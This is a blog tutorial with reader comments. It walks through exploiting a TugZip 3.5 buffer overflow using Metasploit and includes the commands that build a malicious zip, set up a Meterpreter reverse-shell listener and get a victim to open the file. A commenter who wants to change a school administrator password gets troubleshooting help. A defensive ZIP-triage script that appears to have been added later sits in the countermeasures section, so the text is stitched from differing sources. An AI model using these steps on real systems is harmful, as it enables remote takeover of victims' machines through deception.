Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability (Zeroday)

Type: Tutorial

Level: Medium

Attacker OS: BackTrack 5 R1

Victim OS: Windows 7 SP1

Tested Vulnerable Application: TugZip 3.5

Exploit Credit: Stefan Marin, Lincoln, TecR0c, mr_me

I wrote this Hacking Windows 7 SP1 tutorial after browsing around Metasploit and finding this exploit :-).

According to metasploit.com, this exploit works as follows:

This module exploits a stack-based buffer overflow vulnerability in the latest version 3.5 of TugZip archiving utility. In order to trigger the vulnerability, an attacker must convince someone to load a specially crafted zip file with TugZip by double click or file open. By doing so, an attacker can execute arbitrary code as the victim user.

Don't wait too long; try this in your personal lab using a virtual machine.

Requirements:

1. TugZip 3.5 (download from Mediafire.com)

2. TugZip exploit (download from Mediafire.com)

3. Metasploit Framework

Step By Step:

Attacker IP Address: 192.168.8.93

Victim IP Address: 192.168.8.91

1. Download TugZip from the Mediafire link above and install it on the victim computer (for testing purposes).

2. Open the Metasploit console by running the msfconsole command, then update it first with the msfupdate command to refresh the module library. If you don't have an internet connection to update the library, download the exploit above and put it in /pentest/exploits/framework/modules/exploit/windows/fileformat/

Use the exploit and then set up the payload (see picture below).

3. Next, configure the options this exploit needs to match your setup. To view all available options, run the show options command.

Info:

set filename h0T-clipS.zip --> set the desired filename for the malicious file

set lhost 192.168.8.93 --> set the local address the payload connects back to once the exploit triggers successfully

set lport 443 --> our local port that receives the connection from the victim

exploit --> generate the malicious file with the payload

/root/.msf4/data/exploits/h0T-clipS.zip --> the malicious file is stored at this location

4. Next, set up a listener to handle the reverse connection from our exploit (if it triggers successfully).

Info:

use exploit/multi/handler --> set up a handler to receive connections to our machine

set payload windows/meterpreter/reverse_tcp --> must match the payload we set up above

set lhost 192.168.8.93 --> must match the IP we set up above

set lport 443 --> must match the local port we set up above

exploit --> start listening for the incoming connection

5. After everything is set up, send the malicious file from step 3 to the victim and make sure the victim opens it. Once the victim opens our malicious file, our Metasploit console will have an active session on the victim's system.

Pwn3D!!

Countermeasures:

1. As of writing this tutorial (2011-10-15), the status is still zero-day, a.k.a. no patch available.
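With no patch available, the practical defence is to triage archives before a user double-clicks them. The following is an added example (not from the original post or the Metasploit module) that walks a ZIP's local file headers and central directory and flags structural inconsistencies a normal archiver never emits: entry names longer than Windows MAX_PATH, name fields that run past end of file, and local/central disagreement. The tutorial does not say which field TugZip mishandles, so these checks are generic; a hit means "inspect in a sandbox", not proof of an exploit.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"    # local file header: 30 fixed bytes, name length at +26
CENTRAL_SIG = b"PK\x01\x02"  # central directory header: 46 fixed bytes, name length at +28
MAX_NAME = 260               # Windows MAX_PATH; a longer entry name is a red flag for a Win32 archiver


def _headers(data, sig, fixed, name_off):
    """Yield (offset, name_bytes, name_len, end_of_name) for each header carrying `sig`."""
    pos = data.find(sig)
    while pos >= 0:
        if pos + fixed <= len(data):
            name_len = struct.unpack_from("<H", data, pos + name_off)[0]
            end = pos + fixed + name_len
            yield pos, data[pos + fixed:end], name_len, end
        pos = data.find(sig, pos + 1)


def triage_zip(data, max_name=MAX_NAME):
    """Return human-readable findings; an empty list means no structural anomaly was seen."""
    findings = []
    local = list(_headers(data, LOCAL_SIG, 30, 26))
    central = list(_headers(data, CENTRAL_SIG, 46, 28))
    for off, _name, n, end in local + central:
        if n > max_name:
            findings.append("header at %d: name length %d exceeds %d" % (off, n, max_name))
        if end > len(data):
            findings.append("header at %d: name field runs past end of file" % off)
    if len(local) != len(central):
        findings.append("%d local headers vs %d central entries" % (len(local), len(central)))
    for (_, lname, _, _), (coff, cname, _, _) in zip(local, central):
        if lname != cname:
            findings.append("central entry at %d names %r, local header names %r" % (coff, cname, lname))
    return findings


def _make_zip(name):
    """Build a one-entry archive in memory (constructed sample input, not a real capture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, b"hello")
    return buf.getvalue()


BENIGN = _make_zip("notes.txt")                           # constructed: well-formed archive
LONG_NAME = _make_zip("A" * 1000)                         # constructed: oversize entry name in both headers
MISMATCH = BENIGN.replace(b"notes.txt", b"other.txt", 1)  # constructed: local and central names disagree
```

Running `triage_zip` over each sample returns no findings for the benign archive, two oversize-name findings for the long-name archive and one mismatch finding for the patched one.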

Hope it's useful 🙂


Blogger at hacking-tutorial.com. Loves PHP, offensive security and the web. Contact him at me[-at-]vishnuvalentino.com

Visit Website: http://www.vishnuvalentino.com

  • Manvir

    Hi, I opened the file with TugZip and it crashed TugZip, but my BackTrack virtual machine doesn't have any session opened; it still shows "starting the payload handler".
    Please help.

    • v4L

      #Manvir
      Where did you try the exploit? Which Windows version?

  • Manvir

    Windows 7 SP1 Home Premium.
    I am running BackTrack in VirtualBox inside this Windows 7 box.
    Please help, I have to use an exploit in Windows 7 to change the admin password for my school project. I understand the concept, but I can't wrap my head around finding the vulnerability I can exploit.

    • v4L

      #Manvir
      Hmm, actually I don't know the details of your problem, but sometimes this can happen if there's a firewall inside the box that alerts about packets going in and out of the machine.

  • Artrex

    Hello, my friend! I cannot find this file: /root/.msf4/data/exploits/h0T-clipS.zip

    • v4L

      #Artrex
      Did you already run the exploit command?